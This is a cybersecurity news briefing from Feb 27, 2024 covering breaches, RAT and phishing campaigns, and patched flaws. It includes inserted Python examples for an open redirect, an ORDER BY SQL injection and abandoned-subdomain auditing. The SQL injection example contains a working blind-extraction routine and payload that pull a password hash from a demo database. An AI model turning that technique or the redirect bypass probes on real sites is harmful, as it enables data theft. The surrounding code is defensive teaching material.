Cyware Daily Threat Intelligence

Daily Threat Briefing • Feb 27, 2024
Beware of emails disguised as hotel reservation refund inquiries from Booking[.]com. Security researchers uncovered a malicious campaign in which PDF attachments about supposed travel bookings lead to Agent Tesla infections on the recipients' hosts. Separately, a Linux variant of Gh0st RAT has surfaced in the wild. Active since at least 2018, it targets Linux servers, stealing sensitive data and executing attacker-supplied commands on infected hosts.
By abusing more than 8,000 brand-linked domains and 13,000 subdomains, cybercriminals are sending millions of fraudulent emails a day for scams and malvertising; the campaign impersonates brands including MSN and eBay. In parallel, a CMS editor deprecated 14 years ago was exploited to compromise education and government entities worldwide. Its developers have warned against its continued use.
Healthcare software maker targeted
medQ, Inc., a radiology workflow provider, reported a data breach to the Attorney General of Maine after discovering unauthorized access to its software platform. The exposed data includes names, SSNs, and health information, among other fields. Affected individuals have started receiving breach notification letters and have been urged to take precautions against fraud and identity theft.
Akira ransomware strikes Swedish municipality
The Akira ransomware group claims to have crippled the municipality of Bjuv in southern Sweden and is threatening to leak nearly 200GB of stolen data, reportedly including confidential documents and personal HR files. Bjuv Municipality's website remains operational, which the report cites as grounds for doubting the claim, although an intact public website does not by itself rule out data theft.
ThyssenKrupp Automotive division hit, systems down
ThyssenKrupp, the German steel and industrial group, confirmed a cyberattack on its Automotive division that led to the shutdown of IT systems. The incident affected the Automotive Body Solutions business unit, where attackers gained unauthorized access to the IT infrastructure. Production at the Saarland plant was halted, but customer supply remained unaffected. The nature of the attack has not been disclosed and no threat actor has claimed responsibility.
LoanDepot confirms nearly 17 million victims
LoanDepot, a major U.S. loan and mortgage company, revealed that almost 17 million customers had sensitive personal information stolen in the ransomware attack it suffered in January 2024. The stolen data includes names, dates of birth, email and postal addresses, financial account numbers, phone numbers, and SSNs. LoanDepot has not said whether it paid a ransom.
Gh0st RAT Linux variant used in attacks
ASEC uncovered Nood RAT, a Gh0st RAT variant for Linux, being used in campaigns to steal sensitive data from Linux servers. The RAT is a fully featured backdoor: it can download files, exfiltrate system files, and execute commands on the infected host. ASEC's analysis details the malware's builder program and the encryption methods it uses.
UAC-0184 expands stealthy attacks with IDAT
The threat actor UAC-0184 has evolved its tactics, hiding its payload in steganographic image files to deliver Remcos RAT to a Ukrainian entity in Finland. The attack began with carefully crafted phishing emails and used a modular malware loader, named IDAT, that relies on evasion techniques such as dynamic loading of Windows API functions, HTTP connectivity tests, process blocklists, and direct syscalls.
Travel booking scam drops malware
Security researchers at Forcepoint uncovered a campaign that uses booby-trapped PDF files disguised as hotel reservation inquiries from popular travel service providers such as Booking[.]com. The emails claim an erroneous credit card charge and urge recipients to open the attachment to investigate. Opening the PDF starts a download chain that ends with Agent Tesla, which lets the attackers log keystrokes, steal credentials and data, and execute commands remotely.
Zyxel patches flaws in firewalls and access points
Zyxel, the Taiwanese networking vendor, patched four vulnerabilities, CVE-2023-6397, CVE-2023-6398, CVE-2023-6399, and CVE-2023-6764, in its firewalls and access points. Attackers could use them to execute operating system commands, cause denial-of-service conditions, or achieve remote code execution on affected devices. Zyxel has urged users to apply the patches.
Attackers exploit outdated CMS editor
Threat actors abused an open redirect in the long-deprecated FCKeditor WYSIWYG editor to target websites of educational and government institutions worldwide. Because the redirect accepts an arbitrary destination, attackers can craft URLs on trusted institutional hosts that bounce visitors, and search engine crawlers, to scam sites and phishing pages, poisoning search results with the institution's own domain reputation. FCKeditor was deprecated in 2010, yet many organizations still run it, leaving them exposed.
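The following is an added example, not FCKeditor's code, showing the open-redirect pattern described above next to a hardened redirect validator. The site origin and trusted host names are assumptions; the edge cases it handles (protocol-relative URLs, userinfo tricks, backslash variants, non-http schemes, and a double-slash path) are the ones that commonly defeat naive checks.

```python
"""Added example: an open redirect beside a hardened redirect validator.
Illustrative code, not FCKeditor's; host names are constructed."""
from urllib.parse import urljoin, urlsplit

SITE_ORIGIN = "https://www.example.edu"               # assumed site origin
TRUSTED_HOSTS = {"www.example.edu", "example.edu"}    # hosts we may send users to


def redirect_target_vulnerable(next_url: str) -> str:
    """The open-redirect pattern: the request's value becomes the Location header."""
    return next_url


def redirect_target_hardened(next_url: str) -> str:
    """Resolve the candidate against our origin, require a trusted host and an
    http(s) scheme, then emit only a path so no host or userinfo survives."""
    # Browsers treat backslashes as slashes in http(s) URLs; normalise first so
    # "/\evil.example" is seen for the protocol-relative URL it really is.
    candidate = next_url.replace("\\", "/")
    parts = urlsplit(urljoin(SITE_ORIGIN, candidate))
    if parts.scheme not in ("http", "https"):          # javascript:, data:, mailto:, ...
        return "/"
    if parts.hostname not in TRUSTED_HOSTS:            # //evil, https://trusted@evil, ...
        return "/"
    # Collapse leading slashes: a Location of "//evil.example" is protocol-relative.
    path = "/" + parts.path.lstrip("/")
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    for probe in ("/courses?id=3", "//evil.example/x",
                  "https://www.example.edu@evil.example/", "/\\evil.example",
                  "javascript:alert(1)", "https://www.example.edu//evil.example"):
        print(f"{probe!r:45} vulnerable -> {redirect_target_vulnerable(probe)!r:45} "
              f"hardened -> {redirect_target_hardened(probe)!r}")
```

The hardened version deliberately returns a site-relative path even for an absolute URL on a trusted host, which keeps the user on the current origin; if cross-host redirects are a requirement, the allowlist is the place to express that, never the raw parameter.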
Vulnerability puts machine learning models at risk
Researchers identified a vulnerability in the Hugging Face Safetensors conversion service. The flaw allows attackers to tamper with machine learning models that users submit for conversion, opening the door to supply chain attacks. The risk extends beyond the security of the converted models to the datasets stored on Hugging Face.
Critical SQL Injection flaw in WordPress plugin
A critical security flaw (CVE-2024-1071) has been discovered in the popular WordPress plugin Ultimate Member, which has over 200,000 active installations. The vulnerability lets unauthenticated attackers perform SQL injection via the 'sorting' parameter, potentially extracting data from the database. Only sites that have enabled the "Enable custom table for usermeta" option are affected. A fix has been released in version 2.8.3, and users are urged to update immediately.
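A sort parameter is a classic injection point because an ORDER BY column is an identifier, and identifiers cannot be bound as query parameters, so developers splice them into the SQL string. The following is an added example, not Ultimate Member's code, written against an in-memory SQLite database with constructed table and column names: it shows the vulnerable splice, a boolean-based blind extraction that abuses it (a CASE expression in ORDER BY flips the row order depending on a subquery), and the allowlist fix. A tiny character set keeps the demo short; a real attack would iterate the full alphabet.

```python
"""Added example: ORDER BY injection through a user-controlled sort parameter,
a blind-extraction attack against it, and an allowlist fix.
Illustrative code, not Ultimate Member's; schema and data are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a plugin's custom usermeta table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE um_metadata (user_id INTEGER, display_name TEXT);
        INSERT INTO um_metadata VALUES (1, 'alice'), (2, 'bob'), (3, 'carol');
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bhashhash');
        """
    )
    return con


def query_vulnerable(con: sqlite3.Connection, sorting: str):
    """Vulnerable pattern: the sort expression is spliced into the SQL text.
    Bound parameters cannot stand in for identifiers, which is why this
    shortcut is common in ORDER BY handling."""
    sql = f"SELECT user_id, display_name FROM um_metadata ORDER BY {sorting}"
    return con.execute(sql).fetchall()


def leak_admin_hash(con: sqlite3.Connection, length: int = 8, charset: str = "$PBhas") -> str:
    """Boolean-based blind extraction through ORDER BY: a CASE expression sorts
    ascending when the subquery is true and descending when it is false, so the
    first row returned reveals one yes/no answer per request."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            cond = (f"(SELECT substr(user_pass,{pos},1) FROM wp_users "
                    f"WHERE user_login='admin')='{ch}'")
            rows = query_vulnerable(con, f"(CASE WHEN {cond} THEN user_id ELSE -user_id END)")
            if rows[0][0] == 1:          # ascending order => condition was true
                recovered += ch
                break
    return recovered


ALLOWED_SORT_COLUMNS = {"user_id", "display_name"}   # identifiers the app may sort on


def query_hardened(con: sqlite3.Connection, sorting: str):
    """Safe pattern: map the untrusted value onto a fixed identifier and a fixed
    direction; anything else is rejected before it reaches the SQL text."""
    parts = sorting.strip().split()
    if not 1 <= len(parts) <= 2 or parts[0] not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"invalid sort parameter: {sorting!r}")
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"invalid sort direction: {sorting!r}")
    sql = f"SELECT user_id, display_name FROM um_metadata ORDER BY {parts[0]} {direction}"
    return con.execute(sql).fetchall()


def hardened_rejects(con: sqlite3.Connection, sorting: str) -> bool:
    """True if the hardened query refuses the given sort value."""
    try:
        query_hardened(con, sorting)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    payload = "(CASE WHEN 1=1 THEN user_id ELSE -user_id END)"
    print("vulnerable leak:", leak_admin_hash(db))           # $P$Bhash
    print("hardened rejects payload:", hardened_rejects(db, payload))
```

The same allowlist approach applies to WordPress itself: `$wpdb->prepare()` cannot parameterise column names either, so a sort column must be mapped onto a fixed identifier (or escaped with a dedicated identifier-quoting function) before it is concatenated into the query.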
Massive ad fraud campaign spotted
A spam and malvertising campaign, dubbed 'SubdoMailing', has come to light that abuses over 8,000 legitimate domains and 13,000 subdomains to bypass security filters. The abused names include those of major brands such as MSN, VMware, and eBay. By taking over abandoned subdomains of trusted brands, threat actors send more than 5,000,000 scam emails a day that lure users with fake giveaways or surveys.
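Abandoned delegations of the kind this campaign exploits generally take one of two forms: a subdomain whose CNAME points at a domain whose registration has lapsed (register the domain and you control the brand's subdomain), or an SPF record that `include:`s such a domain (register it and your mail passes the brand's SPF). The following is an added example, not the researchers' tooling, that audits a constructed DNS zone snapshot for both; the names and records are invented, and a name absent from the snapshot stands in for NXDOMAIN.

```python
"""Added example: find SubdoMailing-style hijack paths in a DNS zone, namely a
subdomain whose CNAME chain ends at a lapsed domain and an SPF policy that
include:s a lapsed domain. Offline: the zone snapshot below is constructed."""
from typing import Dict, List, Optional, Set, Tuple

# Constructed zone snapshot standing in for live DNS answers (not real data).
# Names absent from the table are treated as unregistered / NXDOMAIN.
ZONE: Dict[str, List[Tuple[str, str]]] = {
    "brand.example": [
        ("TXT", "v=spf1 include:_spf.brand.example include:mail.oldvendor.example -all"),
    ],
    "_spf.brand.example": [("TXT", "v=spf1 ip4:203.0.113.0/24 -all")],
    "promo.brand.example": [("CNAME", "campaign.retiredagency.example")],  # agency's domain lapsed
    "blog.brand.example": [("CNAME", "brand.hosting.example")],             # still live
    "brand.hosting.example": [("A", "198.51.100.10")],
    "shop.brand.example": [("A", "203.0.113.7")],
}

Finding = Tuple[str, str, str]   # (kind, owner name, target name)


def resolve(name: str) -> List[Tuple[str, str]]:
    """Stand-in for a DNS query; an empty list means the name does not exist."""
    return ZONE.get(name.lower().rstrip("."), [])


def cname_chain_end(name: str, max_hops: int = 8) -> Tuple[str, bool]:
    """Follow CNAMEs from `name`; return (final name, True if it has records)."""
    cur = name
    for _ in range(max_hops):
        recs = resolve(cur)
        targets = [data for rtype, data in recs if rtype == "CNAME"]
        if not targets:
            return cur, bool(recs)
        cur = targets[0]
    return cur, False            # loop or over-long chain: treat as unresolvable


def spf_record(name: str) -> Optional[str]:
    for rtype, data in resolve(name):
        if rtype == "TXT" and data.lower().startswith("v=spf1"):
            return data
    return None


def spf_referenced_domains(record: str) -> List[str]:
    """Domains an SPF record delegates trust to via include: or redirect=."""
    out = []
    for term in record.split()[1:]:
        term = term.lstrip("+-~?")           # strip qualifier, if any
        if term.lower().startswith("include:"):
            out.append(term.split(":", 1)[1])
        elif term.lower().startswith("redirect="):
            out.append(term.split("=", 1)[1])
    return out


def audit_spf(name: str, seen: Optional[Set[str]] = None) -> List[Finding]:
    """Walk the include: tree; flag referenced domains with no records at all."""
    seen = set() if seen is None else seen
    findings: List[Finding] = []
    record = spf_record(name)
    if record is None:
        return findings
    for target in spf_referenced_domains(record):
        if target in seen:
            continue
        seen.add(target)
        if spf_record(target) is not None:
            findings += audit_spf(target, seen)
        elif not resolve(target):
            findings.append(("dangling_spf_include", name, target))
        else:
            findings.append(("spf_include_without_spf", name, target))
    return findings


def audit_zone(apex: str) -> List[Finding]:
    """Check every name at or under `apex` for both hijack paths."""
    findings: List[Finding] = []
    for name in ZONE:
        if name != apex and not name.endswith("." + apex):
            continue
        end, alive = cname_chain_end(name)
        if end != name and not alive:
            findings.append(("dangling_cname", name, end))
        findings += audit_spf(name)
    return findings


if __name__ == "__main__":
    for kind, owner, target in audit_zone("brand.example"):
        print(f"{kind:24} {owner} -> {target}")
```

In production the `resolve()` stub would be replaced by real queries (for example with dnspython), and a "no records" result should be confirmed against WHOIS/RDAP before it is called registrable: NXDOMAIN can also mean a zone that exists but has no record at that name. Third-party SPF includes that are alive today still deserve an inventory, since the vendor's renewal, not yours, keeps them that way.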
Chinese users warned about fake apps
China's Ministry of Industry and Information Technology has issued a warning about the circulation of fake wallet apps for the nation's central bank digital currency (CBDC), known as the digital renminbi or e-Yuan. These apps are being used by scammers to deceive users into providing personal information or paying money under false pretenses.